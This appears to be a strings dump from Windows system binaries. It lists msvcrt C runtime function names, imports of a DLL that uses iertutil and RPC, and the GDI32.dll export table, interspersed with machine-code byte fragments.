_strcmpi _strcoll_l _strdate _strdate_s _strdup _strdup_dbg _strerror _strerror_s _stricmp _stricmp_l _stricoll _stricoll_l _strlwr _strlwr_l _strlwr_s _strlwr_s_l _strncoll _strncoll_l _strnicmp _strnicmp_l _strnicoll _strnicoll_l _strnset _strnset_s _strrev _strset _strset_s _strtime _strtime_s _strtod_l _strtoi64 _strtoi64_l _strtol_l _strtoui64 _strtoui64_l _strtoul_l _strupr _strupr_l _strupr_s _strupr_s_l _strxfrm_l _swab _swprintf _swprintf_c _swprintf_c_l _swprintf_p_l _swprintf_s_l _swscanf_l _swscanf_s_l _sys_errlist _sys_nerr _tell _telli64 _tempnam _tempnam_dbg _time32 _time64 _timezone _tolower _tolower_l _toupper _toupper_l _towlower_l _towupper_l _tzname _tzset _ui64toa _ui64toa_s _ui64tow _ui64tow_s _ultoa _ultoa_s _ultow _ultow_s _umask _umask_s _ungetch _ungetwch _unlink _unloaddll _unlock _utime _utime32 _utime64 _vcprintf _vcprintf_l _vcprintf_p _vcprintf_p_l _vcprintf_s _vcprintf_s_l _vcwprintf _vcwprintf_l _vcwprintf_p _vcwprintf_p_l _vcwprintf_s _vcwprintf_s_l _vfprintf_l _vfprintf_p _vfprintf_p_l _vfprintf_s_l _vfwprintf_l _vfwprintf_p _vfwprintf_p_l _vfwprintf_s_l _vprintf_l _vprintf_p _vprintf_p_l _vprintf_s_l _vscprintf _vscprintf_l _vscprintf_p_l _vscwprintf _vscwprintf_l _vscwprintf_p_l _vsnprintf _vsnprintf_c _vsnprintf_c_l _vsnprintf_l _vsnprintf_s _vsnprintf_s_l _vsnwprintf _vsnwprintf_l _vsnwprintf_s _vsnwprintf_s_l _vsprintf_l _vsprintf_p _vsprintf_p_l _vsprintf_s_l _vswprintf _vswprintf_c _vswprintf_c_l _vswprintf_l _vswprintf_p_l _vswprintf_s_l _vwprintf_l _vwprintf_p _vwprintf_p_l _vwprintf_s_l _waccess _waccess_s _wasctime _wasctime_s _wassert _wchdir _wchmod _wcmdln _wcreat _wcscoll_l _wcsdup _wcsdup_dbg _wcserror _wcserror_s _wcsftime_l _wcsicmp _wcsicmp_l _wcsicoll _wcsicoll_l _wcslwr _wcslwr_l _wcslwr_s _wcslwr_s_l _wcsncoll _wcsncoll_l _wcsnicmp _wcsnicmp_l _wcsnicoll _wcsnicoll_l _wcsnset _wcsnset_s _wcsrev _wcsset _wcsset_s _wcstoi64 _wcstoi64_l _wcstol_l _wcstombs_l _wcstombs_s_l _wcstoui64 _wcstoui64_l _wcstoul_l _wcsupr _wcsupr_l _wcsupr_s _wcsupr_s_l _wcsxfrm_l _wctime _wctime32 _wctime32_s _wctime64 _wctime64_s _wctomb_l _wctomb_s_l _wctype _wenviron _wexecl _wexecle _wexeclp _wexeclpe _wexecv _wexecve _wexecvp _wexecvpe _wfdopen _wfindfirst _wfindfirst64 _wfindfirsti64 _wfindnext _wfindnext64 _wfindnexti64 _wfopen _wfopen_s _wfreopen _wfreopen_s _wfsopen _wfullpath _wfullpath_dbg _wgetcwd _wgetdcwd _wgetenv _wgetenv_s _winmajor _winminor _winput_s _winver _wmakepath _wmakepath_s _wmkdir _wmktemp _wmktemp_s _wopen _woutput_s _wperror _wpgmptr _wpopen _wprintf_l _wprintf_p _wprintf_p_l _wprintf_s_l _wputenv _wputenv_s _wremove _wrename _write _wrmdir _wscanf_l _wscanf_s_l _wsearchenv _wsearchenv_s _wsetlocale _wsopen _wsopen_s _wspawnl _wspawnle _wspawnlp _wspawnlpe _wspawnv _wspawnve _wspawnvp _wspawnvpe _wsplitpath _wsplitpath_s _wstat _wstat64 _wstati64 _wstrdate _wstrdate_s _wstrtime _wstrtime_s _wsystem _wtempnam _wtempnam_dbg _wtmpnam _wtmpnam_s _wtof _wtof_l _wtoi _wtoi64 _wtoi64_l _wtoi_l _wtol _wtol_l _wunlink _wutime _wutime32 _wutime64 abort acos asctime asctime_s asin atan atan2 atexit atof atoi atol bsearch bsearch_s btowc calloc ceil clearerr clearerr_s clock cosh ctime difftime exit fabs fclose feof ferror fflush fgetc fgetpos fgets fgetwc fgetws floor fmod fopen fopen_s fprintf fprintf_s fputc fputs fputwc fputws fread free freopen freopen_s frexp fscanf fscanf_s fseek fsetpos ftell fwprintf fwprintf_s fwrite fwscanf fwscanf_s getc getchar getenv getenv_s gets getwc getwchar gmtime is_wctype isalnum isalpha iscntrl isdigit isgraph isleadbyte islower isprint ispunct isspace isupper iswalnum iswalpha iswascii iswcntrl iswctype iswdigit iswgraph iswlower iswprint iswpunct iswspace iswupper iswxdigit isxdigit labs ldexp ldiv localeconv localtime log10 longjmp malloc mblen mbrlen mbrtowc mbsdup_dbg mbsrtowcs mbsrtowcs_s mbstowcs mbstowcs_s mbtowc memchr memcmp memcpy memcpy_s memmove memmove_s memset mktime modf perror printf printf_s putc putchar puts putwc putwchar qsort qsort_s raise rand rand_s realloc remove rename rewind scanf scanf_s setbuf setlocale setvbuf signal sinh sprintf sprintf_s sqrt srand sscanf sscanf_s strcat strcat_s strchr strcmp strcoll strcpy strcpy_s strcspn strerror strerror_s strftime strlen strncat strncat_s strncmp strncpy strncpy_s strnlen strpbrk strrchr strspn strstr strtod strtok strtok_s strtol strtoul strxfrm swprintf swprintf_s swscanf swscanf_s system tanh time tmpfile tmpfile_s tmpnam tmpnam_s tolower toupper towlower towupper ungetc ungetwc utime vfprintf vfprintf_s vfwprintf vfwprintf_s vprintf vprintf_s vsnprintf vsprintf vsprintf_s vswprintf vswprintf_s vwprintf vwprintf_s wcrtomb wcrtomb_s wcscat wcscat_s wcschr wcscmp wcscoll wcscpy wcscpy_s wcscspn wcsftime wcslen wcsncat wcsncat_s wcsncmp wcsncpy wcsncpy_s wcsnlen wcspbrk wcsrchr wcsrtombs wcsrtombs_s wcsspn wcsstr wcstod wcstok wcstok_s wcstol wcstombs wcstombs_s wcstoul wcsxfrm wctob wctomb wctomb_s wprintf wprintf_s wscanf wscanf_s Unknown error Y__^[ _[^] oV f o^0f of@f onPf ov`f o~pf HH:mm:ss dddd, MMMM dd, yyyy MM/dd/yy December November October September August July June April March February January Saturday Friday Thursday Wednesday Tuesday Monday Sunday @_^] ( 8PX 700WP `h```` xpxxxx tvSV GGBB t f; Ar f GGBB Af#E _^[] t*9} ('8PW 700PP ```hhh xppwpp AABB UQPXY]Y[ t+;E u 9] jAXf; tO|= Y[_^] VVVV PPPPP _^[] RPSV j0Xf AAf9 SVW3 AAFFf; _^[] @@BBf; _^[] t*9} @AA;E QCPC _[^] PPPPP HHt3HHt WSj WWWW , ?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~ }J+E u/9] SVWj QQf; _^[] Sj Z; [_^] t&:a YY8] YY8] .com .bat .cmd .exe t 8_ < uC SVWh Ar f Ar f CCGG jXYf; AA@@ u 9E @uJV t/f9 j%Xf; j-Xf; j+Xf; j0Xf; 8@@f; j-Xf; j+Xf; j-X3 j+Xf; t jeXf; jEXf; |49E j-Xf j,hh u 9E csm >csm ~J;w 8csm UVWS [_^] SVWj _^[] URPQQh L$,3 t 9] @@f; u 9E u]@@AA @@AA _^[] VVVVV HHt3HHt HHty+ If90t WSj PPPPP WWWWW , 9 @@f; Jt8Jt Jt.J @@Bf9 YSVW @_^[] 9} t tdFF3 @FFP FF9] @PSS YY8] @@AA _^[] YY8] YY8] PPPPPPPP YY8] 8csm tgSV YYPV t,SV j"^SSSSS ^SSSSS 0SSSSS 0SSSSS c{ zc%C1 .:3q -64OS NKeb kU'9 HMXB atan sqrt acos asin Assertion failed: %s, file %s, line %d log10 FlR!!~w^!~w USERENV.dll iertutil.dll RPCRT4.dll ntdll.dll api-ms-win-downlevel-normaliz-l1-1-0.dll api-ms-win-downlevel-version-l1-1-0.dll api-ms-win-downlevel-shlwapi-l1-1-0.dll api-ms-win-downlevel-user32-l1-1-0.dll KERNEL32.dll msvcrt.dll _ftol2 _ftol2_sse floor memcmp memcpy _strnicmp wcscpy_s memcpy_s __CxxFrameHandler3 isspace isalpha isxdigit isdigit _vsnwprintf iswdigit strcat_s strtoul strncpy_s calloc sprintf_s strpbrk memchr _wcsicmp _vsnprintf _purecall strcpy_s isalnum ispunct iscntrl wcsncmp iswspace _wcsnicmp wcsstr memmove qsort wcschr wcsrchr _vscwprintf rand tolower _wtoi _itow_s wcstok free malloc realloc _XcptFilter _amsg_exit _initterm _lock _unlock __dllonexit _onexit _except_handler4_common memset CreateFileMappingW RaiseException QueryUnbiasedInterruptTime WTSGetActiveConsoleSessionId ProcessIdToSessionId WaitForMultipleObjects GlobalSize GetSystemDirectoryW SwitchToThread CreateIoCompletionPort PostQueuedCompletionStatus FreeLibraryAndExitThread GetQueuedCompletionStatus GetProductInfo CreateEventW GetOverlappedResult InitializeCriticalSectionAndSpinCount QueryPerformanceCounter TerminateProcess SetUnhandledExceptionFilter UnhandledExceptionFilter GetComputerNameW CopyFileW CreateHardLinkW GetVolumeNameForVolumeMountPointW GetVolumeInformationW GetDriveTypeW GetVolumePathNameW CompareFileTime GetFileAttributesExW GetModuleHandleExW MoveFileW CancelThreadpoolIo StartThreadpoolIo CreateThreadpoolIo CloseThreadpoolIo SetFileCompletionNotificationModes GlobalUnlock GlobalLock AcquireSRWLockShared GetDiskFreeSpaceExW DeviceIoControl GetFileSizeEx SetFileInformationByHandle GetDiskFreeSpaceExA MapViewOfFile OpenFileMappingW UnmapViewOfFile LocalFileTimeToFileTime VirtualQuery GetSystemInfo VirtualProtect HeapAlloc HeapFree MultiByteToWideChar WideCharToMultiByte GetLastError EnterCriticalSection LeaveCriticalSection InitializeCriticalSection DeleteCriticalSection GetProcAddress LoadLibraryExA FreeLibrary GetModuleFileNameA HeapDestroy GetFileAttributesW CompareStringW CloseHandle CreateEventA WaitForSingleObject SetEvent lstrcmpiA GetModuleFileNameW HeapReAlloc FileTimeToSystemTime GetFileSize ReadFile CreateFileW SetFilePointer WriteFile SetLastError WritePrivateProfileStringA GetSystemTime CompareStringA RtlMoveMemory GetModuleHandleW InitOnceExecuteOnce DeleteFileW LocalFree LocalAlloc GlobalFree IsValidCodePage CreateFileA IsDBCSLeadByte TlsAlloc GetCurrentThreadId TlsSetValue TlsGetValue TlsFree GetModuleHandleA LoadLibraryA LoadLibraryW OutputDebugStringA GetSystemDirectoryA IsDBCSLeadByteEx GetTickCount GetSystemTimeAsFileTime GetDateFormatA GetTimeFormatA GetTickCount64 FormatMessageA InitializeConditionVariable WakeAllConditionVariable IsWow64Process GetCurrentProcess GetCurrentThread InitializeSRWLock ReleaseSRWLockExclusive ReleaseSRWLockShared AcquireSRWLockExclusive CallbackMayRunLong GetLocaleInfoW GetCPInfoExW SystemTimeToFileTime ResetEvent lstrcmpA GetFileTime GetUserDefaultLangID GetSystemDefaultLangID ExpandEnvironmentStringsW CreateThread Sleep SetFileAttributesW GetCurrentProcessId SetFilePointerEx SetEndOfFile MoveFileExW lstrcmpW LoadLibraryExW FormatMessageW GetUserDefaultLCID GetDateFormatW GetTimeFormatW lstrcmpiW GetProcessHeap HeapSize SleepConditionVariableCS CreateDirectoryW FindFirstFileW FindNextFileW RemoveDirectoryW GetLongPathNameW RaiseFailFastException GetModuleHandleExA FindFirstFileExW GetShortPathNameW FindClose WaitForSingleObjectEx WaitForMultipleObjectsEx CreateThreadpoolWork CloseThreadpoolWork SubmitThreadpoolWork WaitForThreadpoolWorkCallbacks CreateThreadpoolTimer CloseThreadpoolTimer SetThreadpoolTimer WaitForThreadpoolTimerCallbacks CreateThreadpoolWait CloseThreadpoolWait SetThreadpoolWait WaitForThreadpoolWaitCallbacks TrySubmitThreadpoolCallback QueueUserWorkItem GlobalAlloc GetNativeSystemInfo FreeLibraryWhenCallbackReturns CreateEventExA ResumeThread GlobalReAlloc CharNextA CharNextExA CharLowerA CharLowerW CharUpperA UrlUnescapeA StrCmpNICA UrlCombineA UrlCanonicalizeW UrlCombineW StrCmpNICW StrChrA StrChrW StrCmpNW PathCreateFromUrlW StrToIntA StrStrIA StrCmpNA PathStripToRootW StrCmpNCA StrStrIW SHRegGetUSValueA StrRChrW StrStrA StrRChrA StrCmpNIW StrCmpNIA PathRenameExtensionA StrChrNW StrCmpICA PathAddBackslashA GetFileVersionInfoSizeExW VerQueryValueA GetFileVersionInfoExW VerQueryValueW IdnToAscii IdnToUnicode NtClose NtCreateFile NtDeviceIoControlFile NtSetInformationFile RtlAllocateHeap RtlFreeHeap RtlGetVersion RtlNtStatusToDosError RtlIpv6AddressToStringExW RtlIpv4AddressToStringExW RtlIpv6AddressToStringExA RtlIpv6AddressToStringA RtlIpv4AddressToStringA RtlIpv6StringToAddressExW RtlIpv4StringToAddressExW RtlIpv6StringToAddressExA RtlIpv4StringToAddressExA CStdStubBuffer_CountRefs RpcServerRegisterIfEx RpcServerUseProtseqEpW RpcServerUnregisterIfEx NdrClientCall2 RpcBindingBind RpcBindingFree RpcBindingUnbind RpcSmDestroyClientContext I_RpcExceptionFilter RpcRevertToSelf RpcImpersonateClient NdrDllUnregisterProxy NdrDllGetClassObject NdrDllCanUnloadNow NdrDllRegisterProxy NdrCStdStubBuffer_Release CStdStubBuffer_Connect CStdStubBuffer_Invoke RpcBindingCreateW RpcServerUnsubscribeForNotification RpcServerSubscribeForNotification RpcAsyncCompleteCall NdrServerCall2 NdrAsyncServerCall CStdStubBuffer_IsIIDSupported CStdStubBuffer_Disconnect CStdStubBuffer_DebugServerRelease IUnknown_AddRef_Proxy CStdStubBuffer_QueryInterface CStdStubBuffer_DebugServerQueryInterface IUnknown_Release_Proxy NdrOleAllocate NdrOleFree IUnknown_QueryInterface_Proxy CStdStubBuffer_AddRef FastMimeGetFileExtension GetProfileType !This program cannot be run in DOS mode. Rich|z .text `.data .rsrc @.reloc Oqwq Fqw'WqwEWqw) Rqwe qw_mpwe Vqw\ pqw rpw? jswB qwNVrw GDI32.dll AbortDoc AbortPath AddFontMemResourceEx AddFontResourceA AddFontResourceExA AddFontResourceExW AddFontResourceTracking AddFontResourceW AngleArc AnimatePalette AnyLinkedFonts ArcTo BRUSHOBJ_hGetColorTransform BRUSHOBJ_pvAllocRbrush BRUSHOBJ_pvGetRbrush BRUSHOBJ_ulGetBrushColor BeginGdiRendering BeginPath BitBlt CLIPOBJ_bEnum CLIPOBJ_cEnumStart CLIPOBJ_ppoGetPath CancelDC CheckColorsInGamut ChoosePixelFormat Chord ClearBitmapAttributes ClearBrushAttributes CloseEnhMetaFile CloseFigure CloseMetaFile ColorCorrectPalette ColorMatchToTarget CombineRgn CombineTransform ConfigureOPMProtectedOutput CopyEnhMetaFileA CopyEnhMetaFileW CopyMetaFileA CopyMetaFileW CreateBitmap CreateBitmapFromDxSurface CreateBitmapIndirect CreateBrushIndirect CreateColorSpaceA CreateColorSpaceW CreateCompatibleBitmap CreateCompatibleDC CreateDCA CreateDCW CreateDIBPatternBrush CreateDIBPatternBrushPt CreateDIBSection CreateDIBitmap CreateDiscardableBitmap CreateEllipticRgn CreateEllipticRgnIndirect CreateEnhMetaFileA CreateEnhMetaFileW CreateFontA CreateFontIndirectA CreateFontIndirectExA CreateFontIndirectExW CreateFontIndirectW CreateFontW CreateHalftonePalette CreateHatchBrush CreateICA CreateICW CreateMetaFileA CreateMetaFileW CreateOPMProtectedOutputs CreatePalette CreatePatternBrush CreatePen CreatePenIndirect CreatePolyPolygonRgn CreatePolygonRgn CreateRectRgn CreateRectRgnIndirect CreateRoundRectRgn CreateScalableFontResourceA CreateScalableFontResourceW CreateSolidBrush D3DKMTAcquireKeyedMutex D3DKMTCheckExclusiveOwnership D3DKMTCheckMonitorPowerState D3DKMTCheckOcclusion D3DKMTCheckSharedResourceAccess D3DKMTCheckVidPnExclusiveOwnership D3DKMTCloseAdapter D3DKMTConfigureSharedResource D3DKMTCreateAllocation D3DKMTCreateAllocation2 D3DKMTCreateContext D3DKMTCreateDCFromMemory D3DKMTCreateDevice D3DKMTCreateKeyedMutex D3DKMTCreateOverlay D3DKMTCreateSynchronizationObject D3DKMTCreateSynchronizationObject2 D3DKMTDestroyAllocation D3DKMTDestroyContext D3DKMTDestroyDCFromMemory D3DKMTDestroyDevice D3DKMTDestroyKeyedMutex D3DKMTDestroyOverlay D3DKMTDestroySynchronizationObject D3DKMTEscape D3DKMTFlipOverlay D3DKMTGetContextSchedulingPriority D3DKMTGetDeviceState D3DKMTGetDisplayModeList D3DKMTGetMultisampleMethodList D3DKMTGetOverlayState D3DKMTGetPresentHistory D3DKMTGetPresentQueueEvent D3DKMTGetProcessSchedulingPriorityClass D3DKMTGetRuntimeData D3DKMTGetScanLine D3DKMTGetSharedPrimaryHandle D3DKMTInvalidateActiveVidPn D3DKMTLock D3DKMTOpenAdapterFromDeviceName D3DKMTOpenAdapterFromGdiDisplayName D3DKMTOpenAdapterFromHdc D3DKMTOpenKeyedMutex D3DKMTOpenResource D3DKMTOpenResource2 D3DKMTOpenSynchronizationObject D3DKMTPollDisplayChildren D3DKMTPresent D3DKMTQueryAdapterInfo D3DKMTQueryAllocationResidency D3DKMTQueryResourceInfo D3DKMTQueryStatistics D3DKMTReleaseKeyedMutex D3DKMTReleaseProcessVidPnSourceOwners D3DKMTRender D3DKMTSetAllocationPriority D3DKMTSetContextSchedulingPriority D3DKMTSetDisplayMode D3DKMTSetDisplayPrivateDriverFormat D3DKMTSetGammaRamp D3DKMTSetProcessSchedulingPriorityClass D3DKMTSetQueuedLimit D3DKMTSetVidPnSourceOwner D3DKMTSharedPrimaryLockNotification D3DKMTSharedPrimaryUnLockNotification D3DKMTSignalSynchronizationObject D3DKMTSignalSynchronizationObject2 D3DKMTUnlock D3DKMTUpdateOverlay D3DKMTWaitForIdle D3DKMTWaitForSynchronizationObject D3DKMTWaitForSynchronizationObject2 D3DKMTWaitForVerticalBlankEvent DDCCIGetCapabilitiesString DDCCIGetCapabilitiesStringLength DDCCIGetTimingReport DDCCIGetVCPFeature DDCCISaveCurrentSettings DDCCISetVCPFeature DPtoLP DdCreateFullscreenSprite DdDestroyFullscreenSprite DdEntry0 DdEntry1 DdEntry10 DdEntry11 DdEntry12 DdEntry13 DdEntry14 DdEntry15 DdEntry16 DdEntry17 DdEntry18 DdEntry19 DdEntry2 DdEntry20 DdEntry21 DdEntry22 DdEntry23 DdEntry24 DdEntry25 DdEntry26 DdEntry27 DdEntry28 DdEntry29 DdEntry3 DdEntry30 DdEntry31 DdEntry32 DdEntry33 DdEntry34 DdEntry35 DdEntry36 DdEntry37 DdEntry38 DdEntry39 DdEntry4 DdEntry40 DdEntry41 DdEntry42 DdEntry43 DdEntry44 DdEntry45 DdEntry46 DdEntry47 DdEntry48 DdEntry49 DdEntry5 DdEntry50 DdEntry51 DdEntry52 DdEntry53 DdEntry54 DdEntry55 DdEntry56 DdEntry6 DdEntry7 DdEntry8 DdEntry9 DdNotifyFullscreenSpriteUpdate DdQueryVisRgnUniqueness DeleteColorSpace DeleteDC DeleteEnhMetaFile DeleteMetaFile DeleteObject DescribePixelFormat DestroyOPMProtectedOutput DestroyPhysicalMonitorInternal DeviceCapabilitiesExA DeviceCapabilitiesExW DrawEscape Ellipse EnableEUDC EndDoc EndFormPage EndGdiRendering EndPage EndPath EngAcquireSemaphore EngAlphaBlend EngAssociateSurface EngBitBlt EngCheckAbort EngComputeGlyphSet EngCopyBits EngCreateBitmap EngCreateClip EngCreateDeviceBitmap EngCreateDeviceSurface EngCreatePalette EngCreateSemaphore EngDeleteClip EngDeletePalette EngDeletePath EngDeleteSemaphore EngDeleteSurface EngEraseSurface EngFillPath EngFindResource EngFreeModule EngGetCurrentCodePage EngGetDriverName EngGetPrinterDataFileName EngGradientFill EngLineTo EngLoadModule EngLockSurface EngMarkBandingSurface EngMultiByteToUnicodeN EngMultiByteToWideChar EngPaint EngPlgBlt EngQueryEMFInfo EngQueryLocalTime EngReleaseSemaphore EngStretchBlt EngStretchBltROP EngStrokeAndFillPath EngStrokePath EngTextOut EngTransparentBlt EngUnicodeToMultiByteN EngUnlockSurface EngWideCharToMultiByte EnumEnhMetaFile EnumFontFamiliesA EnumFontFamiliesExA EnumFontFamiliesExW EnumFontFamiliesW EnumFontsA EnumFontsW EnumICMProfilesA EnumICMProfilesW EnumMetaFile EnumObjects EqualRgn Escape EudcLoadLinkW EudcUnloadLinkW ExcludeClipRect ExtCreatePen ExtCreateRegion ExtEscape ExtFloodFill ExtSelectClipRgn ExtTextOutA ExtTextOutW FONTOBJ_cGetAllGlyphHandles FONTOBJ_cGetGlyphs FONTOBJ_pQueryGlyphAttrs FONTOBJ_pfdg FONTOBJ_pifi FONTOBJ_pvTrueTypeFontFile FONTOBJ_pxoGetXform FONTOBJ_vGetInfo FillPath FillRgn FixBrushOrgEx FlattenPath FloodFill FontIsLinked FrameRgn GdiAddFontResourceW GdiAddGlsBounds GdiAddGlsRecord GdiAlphaBlend GdiArtificialDecrementDriver GdiCleanCacheDC GdiComment GdiConsoleTextOut GdiConvertAndCheckDC GdiConvertBitmap GdiConvertBitmapV5 GdiConvertBrush GdiConvertDC GdiConvertEnhMetaFile GdiConvertFont GdiConvertMetaFilePict GdiConvertPalette GdiConvertRegion GdiConvertToDevmodeW GdiCreateLocalEnhMetaFile GdiCreateLocalMetaFilePict GdiDeleteLocalDC GdiDeleteSpoolFileHandle GdiDescribePixelFormat GdiDllInitialize GdiDrawStream GdiEndDocEMF GdiEndPageEMF GdiEntry1 GdiEntry10 GdiEntry11 GdiEntry12 GdiEntry13 GdiEntry14 GdiEntry15 GdiEntry16 GdiEntry2 GdiEntry3 GdiEntry4 GdiEntry5 GdiEntry6 GdiEntry7 GdiEntry8 GdiEntry9 GdiFixUpHandle GdiFlush GdiFullscreenControl GdiGetBatchLimit GdiGetBitmapBitsSize GdiGetCharDimensions GdiGetCodePage GdiGetDC GdiGetDevmodeForPage GdiGetLocalBrush GdiGetLocalDC GdiGetLocalFont GdiGetPageCount GdiGetPageHandle GdiGetSpoolFileHandle GdiGetSpoolMessage GdiGradientFill GdiInitSpool GdiInitializeLanguagePack GdiIsMetaFileDC GdiIsMetaPrintDC GdiIsPlayMetafileDC GdiIsScreenDC GdiLoadType1Fonts GdiPlayDCScript GdiPlayEMF GdiPlayJournal GdiPlayPageEMF GdiPlayPrivatePageEMF GdiPlayScript GdiPrinterThunk GdiProcessSetup GdiQueryFonts GdiQueryTable GdiRealizationInfo GdiReleaseDC GdiReleaseLocalDC GdiResetDCEMF GdiSetAttrs GdiSetBatchLimit GdiSetLastError GdiSetPixelFormat GdiSetServerAttr GdiStartDocEMF GdiStartPageEMF GdiSwapBuffers GdiTransparentBlt GdiValidateHandle GetArcDirection GetAspectRatioFilterEx GetBitmapAttributes GetBitmapBits GetBitmapDimensionEx GetBkColor GetBkMode GetBoundsRect GetBrushAttributes GetBrushOrgEx GetCOPPCompatibleOPMInformation GetCertificate GetCertificateSize GetCharABCWidthsA GetCharABCWidthsFloatA GetCharABCWidthsFloatW GetCharABCWidthsI GetCharABCWidthsW GetCharWidth32A GetCharWidth32W GetCharWidthA GetCharWidthFloatA GetCharWidthFloatW GetCharWidthI GetCharWidthInfo GetCharWidthW GetCharacterPlacementA GetCharacterPlacementW GetClipBox GetClipRgn GetColorAdjustment GetColorSpace GetCurrentObject GetCurrentPositionEx GetDCBrushColor GetDCOrgEx GetDCPenColor GetDIBColorTable GetDIBits GetDeviceCaps GetDeviceGammaRamp GetETM GetEUDCTimeStamp GetEUDCTimeStampExW GetEnhMetaFileA GetEnhMetaFileBits GetEnhMetaFileDescriptionA GetEnhMetaFileDescriptionW GetEnhMetaFileHeader GetEnhMetaFilePaletteEntries GetEnhMetaFilePixelFormat GetEnhMetaFileW GetFontAssocStatus GetFontData GetFontFileData GetFontFileInfo GetFontLanguageInfo GetFontRealizationInfo GetFontResourceInfoW GetFontUnicodeRanges GetGlyphIndicesA GetGlyphIndicesW GetGlyphOutline GetGlyphOutlineA GetGlyphOutlineW GetGlyphOutlineWow GetGraphicsMode GetHFONT GetICMProfileA GetICMProfileW GetKerningPairs GetKerningPairsA GetKerningPairsW GetLayout GetLogColorSpaceA GetLogColorSpaceW GetMapMode GetMetaFileA GetMetaFileBitsEx GetMetaFileW GetMetaRgn GetMiterLimit GetNearestColor GetNearestPaletteIndex GetNumberOfPhysicalMonitors GetOPMInformation GetOPMRandomNumber GetObjectA GetObjectType GetObjectW GetOutlineTextMetricsA GetOutlineTextMetricsW GetPaletteEntries GetPath GetPhysicalMonitorDescription GetPhysicalMonitors GetPixel GetPixelFormat GetPolyFillMode GetROP2 GetRandomRgn GetRasterizerCaps GetRegionData GetRelAbs GetRgnBox GetStockObject GetStretchBltMode GetStringBitmapA GetStringBitmapW GetSuggestedOPMProtectedOutputArraySize GetSystemPaletteEntries GetSystemPaletteUse GetTextAlign GetTextCharacterExtra GetTextCharset GetTextCharsetInfo GetTextColor GetTextExtentExPointA GetTextExtentExPointI GetTextExtentExPointW GetTextExtentExPointWPri GetTextExtentPoint32A GetTextExtentPoint32W GetTextExtentPointA GetTextExtentPointI GetTextExtentPointW GetTextFaceA GetTextFaceAliasW GetTextFaceW GetTextMetricsA GetTextMetricsW GetTransform GetViewportExtEx GetViewportOrgEx GetWinMetaFileBits GetWindowExtEx GetWindowOrgEx GetWorldTransform HT_Get8BPPFormatPalette HT_Get8BPPMaskPalette IntersectClipRect InvertRgn IsValidEnhMetaRecord IsValidEnhMetaRecordOffExt LPtoDP LineDDA LineTo MaskBlt MirrorRgn ModifyWorldTransform MoveToEx NamedEscape OffsetClipRgn OffsetRgn OffsetViewportOrgEx OffsetWindowOrgEx PATHOBJ_bEnum PATHOBJ_bEnumClipLines PATHOBJ_vEnumStart PATHOBJ_vEnumStartClipLines PATHOBJ_vGetBounds PaintRgn PatBlt PathToRegion PlayEnhMetaFile PlayEnhMetaFileRecord PlayMetaFile PlayMetaFileRecord PlgBlt PolyBezier PolyBezierTo PolyDraw PolyPatBlt PolyPolygon PolyPolyline PolyTextOutA PolyTextOutW Polygon Polyline PolylineTo PtInRegion PtVisible QueryFontAssocStatus RealizePalette RectInRegion RectVisible Rectangle RemoveFontMemResourceEx RemoveFontResourceA RemoveFontResourceExA RemoveFontResourceExW RemoveFontResourceTracking RemoveFontResourceW ResetDCA ResetDCW ResizePalette RestoreDC RoundRect STROBJ_bEnum STROBJ_bEnumPositionsOnly STROBJ_bGetAdvanceWidths STROBJ_dwGetCodePage STROBJ_vEnumStart SaveDC ScaleViewportExtEx ScaleWindowExtEx SelectBrushLocal SelectClipPath SelectClipRgn SelectFontLocal SelectObject SelectPalette SetAbortProc SetArcDirection SetBitmapAttributes SetBitmapBits SetBitmapDimensionEx SetBkColor SetBkMode SetBoundsRect SetBrushAttributes SetBrushOrgEx SetColorAdjustment SetColorSpace SetDCBrushColor SetDCPenColor SetDIBColorTable SetDIBits SetDIBitsToDevice SetDeviceGammaRamp SetEnhMetaFileBits SetFontEnumeration SetGraphicsMode SetICMMode SetICMProfileA SetICMProfileW SetLayout SetLayoutWidth SetMagicColors SetMapMode SetMapperFlags SetMetaFileBitsEx SetMetaRgn SetMiterLimit SetOPMSigningKeyAndSequenceNumbers SetPaletteEntries SetPixel SetPixelFormat SetPixelV SetPolyFillMode SetROP2 SetRectRgn SetRelAbs SetStretchBltMode SetSystemPaletteUse SetTextAlign SetTextCharacterExtra SetTextColor SetTextJustification SetViewportExtEx SetViewportOrgEx SetVirtualResolution SetWinMetaFileBits SetWindowExtEx SetWindowOrgEx SetWorldTransform StartDocA StartDocW StartFormPage StartPage StretchBlt StretchDIBits StrokeAndFillPath StrokePath SwapBuffers TextOutA TextOutW TranslateCharsetInfo UnloadNetworkFonts UnrealizeObject UpdateColors UpdateICMRegKeyA UpdateICMRegKeyW WidenPath XFORMOBJ_bApplyXform XFORMOBJ_iGetXform XLATEOBJ_cGetPalette XLATEOBJ_hGetColorTransform XLATEOBJ_iXlate XLATEOBJ_piVector bInitSystemAndFontsDirectoriesW bMakePathNameW cGetTTFFromFOT gdiPlaySpoolStream SVW3 QQSV _^[] SVW3 tL9] tG9] SVW% _^[] ^_[] _^[] tT_[] tc9E t^9E ^@[] t:9=` _^[] QQSV _^[] _^[] vuIW @^[_ E0SV3 j(Zf U$t- D0PP _^[] G@_^ SVW= _^[] v SW ^ _^[ _^[] _@^] X_^[] u!9} SVSP \\.\DISPLAY DISPLAY VWj'Y SVW3 v h@ LpkEditControl LpkDrawTextEx LpkPSMTextOut LpkTabbedTextOut LPK.DLL Y__^[ ut9u wof9w t ;] t ;E0 j`h` +E$9E(r QQS3 tc9] SSPQSSW @0jPj PjXW PjXW v_^] _^[] f9|VLt t 9E t&r @@Kf |VLu AA@f rI9u u ;u _^[] tySW @_[^ 9E t 9E G@;E G@;E BBf; f9|VL Wj9] @_^] SVW% _^[] _^[] @0SV @0QV SVW3 )WQP u6h3 u:jPh E(+E +E$P M(+M +M$QP u(+u t 9u u%VVj VVWV @0WV t 9u t+;] @0SV ?(r' #E P @0Vj @0Vj 9F$u @0Vj OwglGetCurrentContext wglMakeCurrent wglDeleteContext wglCreateContext GlmfCloseMetaFile GlmfEndPlayback GlmfEndGlsBlock GlmfPlayGlsRecord GlmfBeginGlsBlock GlmfInitPlayback _^[] _^[] [_^] @_^] QWSP t4SSWVP t09E u"9E t[WVW @0Vj t-PV _^[] 'PRj _@^] GDIC QQSV j(X3 GDIC G _^[ K|t3V uPWj @_^[] u8RjL _^[] _^[] LPK.dll USER32.dll KERNEL32.dll API-MS-Win-Security-Base-L1-1-0.dll API-MS-Win-Core-LocalRegistry-L1-1-0.dll ntdll.dll _strnicmp _stricmp RtlCreateUnicodeStringFromAsciiz strncpy NtVdmControl RtlDecodePointer RtlCompareMemory wcsrchr wcschr 